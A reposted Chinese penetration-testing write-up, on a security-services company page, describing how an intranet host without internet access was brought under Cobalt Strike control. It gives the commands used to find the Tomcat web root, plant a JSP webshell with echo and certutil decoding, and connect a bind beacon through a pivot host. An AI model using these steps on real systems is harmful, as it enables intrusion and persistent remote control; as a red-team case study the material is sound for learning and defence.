一次不出网上线cs实战案例_集群智慧网络安全云
全国客户服务热线:4006-054-001 疑难解答:159-9855-7370(7X24受理投诉、建议、合作、售前咨询),173-0411-9111(售前),155-4267-2990(售前),座机/传真:0411-83767788(售后),微信咨询:543646
企业服务导航

一次不出网上线cs实战案例

发布日期:2024-05-19 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370


一次不出网上线cs实战案例

场景 shiro打点获取10段服务器权限,在10段机器出网且已上线cs;172段不出网且反向不通10段,已通过mysql弱口令获取system权限,存在web服务。 上线过程 思路:写入webshell,通过正向马上线cs。 getshell 通过web服务获取一个web目录下的文件名:stf-login-bg.jpg 获取所有盘符 wmic logicaldisk get caption,name 通过文件名获取web目录 dir /a /s /b d:"stf-login-bg.jpg" 根据图片URL确定D:apache-tomcat-7.0.73-windows-x64apache-tomcat-7.0.73webappsROOTstaticimagesloginstf-login-bg.jpg为真实web路径,使用可dir到此路径。 echo配合certutil写入webshell: //base64编码shell.jspcertutil -encode shell.jsp jsp.txt //echo编码后的内容到web目录echo xxxx >D:\apache-tomcat-7.0.73-windows-x64\apache-tomcat-7.0.73\webapps\ROOT\static\images\login\12.txt //解码还原文件certutil -decode D:\apache-tomcat-7.0.73-windows-x64\apache-tomcat-7.0.73\webapps\ROOT\static\images\login\12.txt D:\apache-tomcat-7.0.73-windows-x64\apache-tomcat-7.0.73\webapps\ROOT\static\images\login\123.jsp   上线cs 新建监听器 生成正向马 通过webshell上传到目标机器并执行,使用跳板机连接,上线cs。 connect 172.20.57.122 28888 文章来源:tide安全团队 黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担! 如侵权请私聊我们删文 END

一次不出网上线cs实战案例